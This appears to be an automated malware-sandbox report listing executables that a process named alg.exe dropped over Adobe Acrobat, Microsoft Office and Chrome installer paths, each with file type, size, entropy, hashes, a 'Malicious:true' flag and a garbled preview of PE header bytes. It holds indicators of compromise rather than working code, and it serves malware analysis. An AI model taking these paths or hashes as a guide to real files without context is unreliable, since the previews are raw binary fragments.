                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@..........................................................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...`.......P...v..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1384960
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.377826671787026
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:QxwSJhkrmZs/sqjnhMgeiCl7G0nehbGZpbD:Qy+krKsjDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7AC4745246DA46490D4A809FC511DF63
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:09AAE061CADD98569D9F43A818D13AE4D9F4C877
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6184FD3224EFF77DFFC3FF77FC687D8B4475A37166F3F856EF3BED74E253B65B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5C79C2E7BF604E7EEDB41F29D3C6BC168D012AC7D6A4784DF1E3E3086DC254B1AB0E3F69AC02560729845BFE5FF4949CA4D2BCAA4C93E00F3E337742C15ED666
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@....................................q..... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1649152
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.632744293214225
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:WHQJLIRgvsnNmsqjnhMgeiCl7G0nehbGZpbD:WHQJL34qDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:63B0973F999D99602E8EF75BE5765BD7
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:56073083E64B823A69FC8D0B47874C532FB1427D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:021CBA53D124B9F77B7A42A0BD0CFC9F72511809644FF4E91B9F2F31F2E976C3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6762E35EBE8136B4C500F1130B2F546F549F62A4D63FD95BC40B9BDA1FD42CF1F39573C87BD0E813983E01711268FB509B3BF808BBB3F171AEAABC7883AE9D51
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@....................................<..... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5365760
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.45098194450707
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:CUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kR:NWmXL6DEC7dRpKuDQbg9D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:20477EB781EF9421ACE494B01985C2F0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A27A7D38890A7EFEB3E9212A6C343239C33145D6
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:48B4A63353DB96E2199DCB05F7A4184F20ED8A5FDC331893307370F454BC2883
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F5CA509B06CBD488881070B1654FDE6CA0A83937AE6AB332F5F095ADC7B757BFCD35A85FD3E94113128F497A74704FD825A277D736F7AF7BFBD40CC5F1B8DE7A
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.....`.R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3163136
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.972782711964563
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:98304:urZ23AbsK6Ro022JjL2WEiVqJZWD527BWG:4JADmmxL2WEoCZWVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C27BE1BDC71E6C8736767A38C204DE8A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:44BA62AE98E837B15D7EA17B60B7AA9BCB91231C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:FAAB21855E46862AEB49627C3BFBB058914BEFC81C99FD9A60B0765E9219DCF3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F8E59A034F43AD099C3592B6BCC5321D51D27398837E272A2A43E3EE7D9E6F007E35F72D3F3C616A48CAEF93A713E4BDAC8202880DD549EFC996727B13162618
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1.....3#1.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1213440
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.204936401929052
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:FfrYY42wd7hlOw9fpkEE64vsqjnhMgeiCl7G0nehbGZpbD:oz9xrSTDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9E4993214951BEBFB2904B296DF06287
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C960BB39DCFA2A2978DDF050E61675F8852EBE46
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B2A307F748E0A8B69562FA20377BDA2B18F1AFA701EADA88034E706AF67DBAFE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:27876A98A3F3014287AF6132748D0A29166BDEB1291429BB7C5F397C47A9C1F1E84A82156933D5FBD1CA067122C9239FBB5609F185A4B775E53E3704EB8DE110
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ............ ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1388544
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.272956844929789
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:/wkNKiZ+R2GGNUbTF5kXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:/zNKUE5ksqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F2A12407E3042D67FFFFF10A18885F95
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3114E831B123E0E8162CEE5FA98FFD36455F00A9
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:973FEA325F45F38485B73E3F1DDCE87AE24E7229BEA02BB7C0146EF5E022515B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B032D50B321DA84DE74FA38F85FB4B377B090F6C923060731F944213AEA1777F421EEC6AB88C25A554CC14FA48EAF47DF707C8320BD68DD4728BA18FB5E529C4
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P............ .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5855744
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.574338124402439
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:98304:SALuzDKnxCp3JKNrPJzruaI6HMaJTtGbpD527BWG:1aGg3cFPIaI6HMaJTtGbpVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F0FF2E7F995484C3C0803811AF54F72E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C2E9AFF209EE7D6BC54D28DF1B391CF9A385BCED
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F217B5A57579F69519103085FE9F3F3CC9B581823AFE1C304150E0C5EB49DBDB
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C82863951CC3DF93857F4331F163BB1BFC9D936BB4D517349176A48043A99A6AFD7AEAA9C933831CFD243F5230EA2E888D3487B0DAFCA3F75875ABE25042B069
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y......LZ... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1312768
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3560872281909955
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:cXr/SVMxW7sqjnhMgeiCl7G0nehbGZpbD:M1xWDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:5C6B4F5242AC061FC532EB8B5311431E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:04173944406E5C4832A9D40A3128DC3174D3DF25
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1740B667B8372A444C1B00DF8AB601B31E8FF42D765B05EDEBE2DC702C567BC4
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EA77400BC07FF356EC61ED87EF0407AEFB9AB271944DF1A4899DF1061FE31CAF85B8AA3F3FB09CC26D5465983A6AE07009EC98C1937B25492FA20A5C807F2CBF
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P.......-........... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):27533312
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.24863858900142
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:196608:1hRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQONVQBWG:1hRCpGpMJMrbp8JjpNdNlc53B
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:FD434C0B887E77F8B6B9E0D3597F9786
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BE146B26F3C975FCBBEB6A9609D94824ABD84F1B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E025231D8CB596F7AF8FF001161A8C24F080E371B1E95CD963BC2EDEBE360E29
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:CD68D15D76B62DC56C27EA649A43112A3EEB8DFEA68B3567BA64283F48FC51C99EA705B929BC28B8CDC492D2092B4A61610C4D55360A2FADC085D17E9E2CF5E0
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@.......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2199552
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.789015825428198
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:183pZ3kd0CuEeN0LUmRXzYs65mlDmg27RnWGj:lKuUQY156D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:754734BDE2CBDF8D75083CAF77FD4407
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:AE173596464D646A9B621445E02B5A13941A477D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4785728C2B41C97719A47AB3B29FD9DF4C606B56EA2153B1150F762A8D1AAAD1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C4CBD122A46B7DD83AFAC840258A36367EC4B770CEFAB43B73AE94FB48A67D71FA02E7B061C24ED3434E9F66BBA08888738237D5E983CE339AC9AB6364ED51B7
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!.....0\"... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4971008
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.6708449332310265
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:pErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+MI:PA4oGlcR+glEdOPKzgVZPD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CF9EBFE82F3E5FC841763B972509E4AF
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:541CF008E3BCED1CDCD9D13ACBDC6FE0CAFF557A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5E8F96896C27CEF86D1FA99691DB09D7C3672134533FD3CD08303BD8D60F9B30
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:401EA6E293735B80672A5802FEE1FC037617C23EE7D77C5EA9C1B8C0BF478D483258F5D0AF47202A5C15E1C4165FE502FDB2DFE40D49EB99DFF92E46F320AD65
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L......L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.82977764310637
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:k8ErDqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKm:Bv2gM+qwXLg7pPgw/DSZ9YD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0B29F97B1EE3D4474249E3415A023368
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:085BB1325189F3B312A20D06C9A31755DE009D0C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4063A188C2AB76AFC97D5B5F0567323B1F43F9179EDB4AF3275189C9856D47FF
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AC3B92EE2C7B9170CF09AA4E187D7CC1DCB5C28900A8DC08EE435B4463E56011ABBB31F1C7F4010EE9180B870A0CA29D7F3F55C384D418275271FCC5677F2102
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.829776519655297
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:D8ErDqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKm:Qv2gM+qwXLg7pPgw/DSZ9YD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1310795B8B89AAF002F08873D5B036F2
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A200B9A33E1725D6D76B2988B20B6C77CD696A5F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C0F272EF1D215AF284F4319FBDEF3D8CBB8E30D26B24D3366AB11D21835C4C8F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:73083B2F71356CE0CB8B4065ECF9ECC5B92770C5C6E864D6CE22C4D6C0AF91C5715FEC380091164182767E1F4EF03BA9F600FDBC5A984FB6C3D346AE6B34B501
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
